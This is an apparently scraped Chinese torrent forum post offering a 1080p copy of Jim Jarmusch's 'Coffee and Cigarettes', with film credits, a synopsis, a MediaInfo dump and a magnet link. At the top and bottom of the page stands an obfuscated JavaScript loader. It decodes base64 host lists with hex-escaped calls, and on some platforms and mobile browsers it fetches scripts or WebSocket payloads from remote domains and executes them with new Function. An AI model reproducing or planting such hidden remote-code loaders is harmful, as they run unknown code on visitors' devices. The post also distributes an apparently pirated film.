咖啡与香烟[中文字幕].Coffee.and.Cigarettes.2003.1080p.BluRay.x265.10bit.AC3 6.07GB

版主小s 1月前 213

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 咖啡与香烟 / 咖啡与烟(台) / 咖啡和香烟

◎片 名 Coffee and Cigarettes

◎年 代 2003

◎产 地 美国 / 日本 / 意大利

◎类 别 剧情 / 喜剧 / 音乐

◎语 言 英语 / 法语

◎上映日期 2003-09-05

◎IMDb链接 https://www.imdb.com/title/tt0379217/

◎豆瓣评分 8.0/10 (9680人评价)

◎豆瓣链接 https://movie.douban.com/subject/1394176/

◎片 长 95 分钟

◎导 演 吉姆·贾木许 Jim Jarmusch (id:1041006)

◎编 剧 吉姆·贾木许 Jim Jarmusch (id:1041006)

◎演 员 罗伯托·贝尼尼 Roberto Benigni (id:1041004)

史蒂夫·赖特 Steven Wright (id:1036771)

茹瓦·李 Joie Lee (id:1009662)

伊基·波普 Iggy Pop (id:1045097)

汤姆·威兹 Tom Waits (id:1036356)

阿莱克斯·德斯卡 Alex Descas (id:1282294)

伊萨赫·德·班克尔 Isaach De Bankolé (id:1022827)

凯特·布兰切特 Cate Blanchett (id:1054441)

杰克·怀特 Jack White (id:1183297)

梅格·怀特 Meg White (id:1036893)

阿尔弗雷德·莫里纳 Alfred Molina (id:1017897)

史蒂夫·库根 Steve Coogan (id:1027820)

加里格莱斯 The GZA (id:1175764)

罗伯特·菲茨杰拉德·迪格斯 RZA (id:1009393)

比尔·默瑞 Bill Murray (id:1054508)

威廉·赖斯 William Rice (id:1055436)

泰勒·米德 Taylor Mead (id:1118940)

乔安娜·威森特 Joana Vicente (id:1300026)

吉姆·斯塔克 Jim Stark (id:1298272)

Demetra J. MacBride Demetra J. MacBride (id:1290593)

吉姆·贾木许 Jim Jarmusch (id:1041006)

杰伊·拉比诺维茨 Jay Rabinowitz (id:1295114)

瑞纳·迪安基洛 Rena DeAngelo (id:1282115)

马克·弗里德伯格 Mark Friedberg (id:1284205)

朱迪·金 Judy Chin (id:1280574)

◎标 签 美国 / 吉姆·贾木许 / JimJarmusch / 短片 / 短片集 / 贾木许 / 美国电影 / 黑白

◎简 介

本片是由11个黑白短片综合而成的短篇集,每个短片都围绕咖啡与香烟展开。

一。罗伯托·贝尼尼(罗伯托·贝尼尼 Roberto Benigni 饰)坐在一家咖啡馆喝着咖啡,史蒂夫·赖特(史蒂夫·赖特 Steven Wright 饰)过来与他攀谈,然而两人似乎没有什么共同语言 ,只在重复表达对咖啡与香烟的热爱……

二。一家咖啡厅里坐着一对黑人双胞胎兄妹,咖啡厅服务员突然对他们很感兴趣,即坐下与之热情交谈,然而兄妹俩似乎对这个不知所云的人毫无兴趣,只在继续抽烟喝咖啡……

三。加利福尼亚某处的一家咖啡馆,流行歌手伊基·波普(伊基·波普 Iggy Pop 饰)与汤姆·威兹(汤姆·威兹 Tom Waits 饰)正在以抽烟的方式庆祝他们戒烟成功。该短片曾获1993年戛纳电影节短片单元金棕榈奖。

……

十一。这天夜里,喝着速溶咖啡、抽着卷烟的两个老人William R...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 184171585882331431261601986037950218804 (0x8A8E283F4831750C16731CF8E3188234)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.07 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate : 9 013 kb/s

  10. Encoded date : UTC 2021-11-02 07:29:19

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 36 min

  20. Bit rate : 8 279 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.167

  30. Stream size : 5.57 GiB (92%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : AC-3

  40. Format/Info : Audio Coding 3

  41. Commercial name : Dolby Digital

  42. Codec ID : A_AC3

  43. Duration : 1 h 36 min

  44. Bit rate mode : Constant

  45. Bit rate : 640 kb/s

  46. Channel(s) : 5 channels

  47. Channel layout : L R C Ls Rs

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 31.250 FPS (1536 SPF)

  50. Compression mode : Lossy

  51. Stream size : 441 MiB (7%)

  52. Language : English

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Text #1

  58. ID : 3

  59. ID in the original source medium : 4610 (0x1202)

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 30 min

  65. Bit rate : 52.4 kb/s

  66. Count of elements : 2116

  67. Stream size : 34.0 MiB (1%)

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4611 (0x1203)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 30 min

  80. Bit rate : 52.8 kb/s

  81. Count of elements : 2116

  82. Stream size : 34.2 MiB (1%)

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Text #3

  88. ID : 5

  89. ID in the original source medium : 4612 (0x1204)

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 30 min

  95. Bit rate : 29.7 kb/s

  96. Count of elements : 2116

  97. Stream size : 19.2 MiB (0%)

  98. Language : Chinese

  99. Default : No

  100. Forced : No

  101. Original source medium : Blu-ray


  102. Text #4

  103. ID : 6

  104. ID in the original source medium : 4613 (0x1205)

  105. Format : PGS

  106. Muxing mode : zlib

  107. Codec ID : S_HDMV/PGS

  108. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  109. Duration : 1 h 30 min

  110. Bit rate : 30.1 kb/s

  111. Count of elements : 2116

  112. Stream size : 19.5 MiB (0%)

  113. Language : Chinese

  114. Default : No

  115. Forced : No

  116. Original source medium : Blu-ray


  117. Text #5

  118. ID : 7

  119. ID in the original source medium : 4609 (0x1201)

  120. Format : PGS

  121. Muxing mode : zlib

  122. Codec ID : S_HDMV/PGS

  123. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  124. Duration : 1 h 30 min

  125. Bit rate : 85.1 kb/s

  126. Count of elements : 3574

  127. Stream size : 54.9 MiB (1%)

  128. Language : English

  129. Default : No

  130. Forced : No

  131. Original source medium : Blu-ray


  132. Menu

  133. 00:00:00.000 : en:第 01 章

  134. 00:06:37.438 : en:第 02 章

  135. 00:12:56.942 : en:第 03 章

  136. 00:24:07.404 : en:第 04 章

  137. 00:28:38.007 : en:第 05 章

  138. 00:33:33.136 : en:第 06 章

  139. 00:41:54.553 : en:第 07 章

  140. 00:53:24.326 : en:第 08 章

  141. 01:00:55.193 : en:第 09 章

  142. 01:18:16.483 : en:第 10 章

  143. 01:26:17.297 : en:第 11 章

  144. 01:32:31.546 : en:第 12 章




复制代码


TAGS 剧情 喜剧 音乐

磁力链:
  • magnet:?xt=urn:btih:452DE66BDB985007C738FDD193584DEE06EE8A5E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};